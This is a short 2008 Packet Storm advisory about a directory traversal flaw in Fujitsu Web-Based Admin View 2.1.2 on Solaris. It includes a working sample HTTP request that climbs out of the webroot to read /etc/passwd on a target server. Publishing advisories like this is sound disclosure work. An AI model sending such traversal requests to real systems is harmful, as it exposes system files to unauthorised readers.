fujitsu-traverse.txt

2008-08-22T00:00:00
ID PACKETSTORM:69299
Type packetstorm
Reporter Deniz Cevik
Modified 2008-08-22T00:00:00

Description

                                        
                                            `Fujitsu Web-Based Admin View Directory Traversal Vulnerability  
  
  
  
Version: 2.1.2 on Solaris, Other versions may vulnerable  
  
  
  
Vulnerability: Directory Traversal  
  
  
  
Risk: Critical  
  
  
  
Description: Due to insufficient control of user inputs, Fujitsu  
Web-based admin view reveals content of files residing in folders other  
than webroot. This will allow an attacker to view arbitrary local files  
within the context of the web server.   
  
  
  
Sample Request:  
  
  
  
GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0  
  
Host: target:8081  
  
  
  
Deniz CEVIK  
  
www.intellectpro.com.tr  
  
  
  
`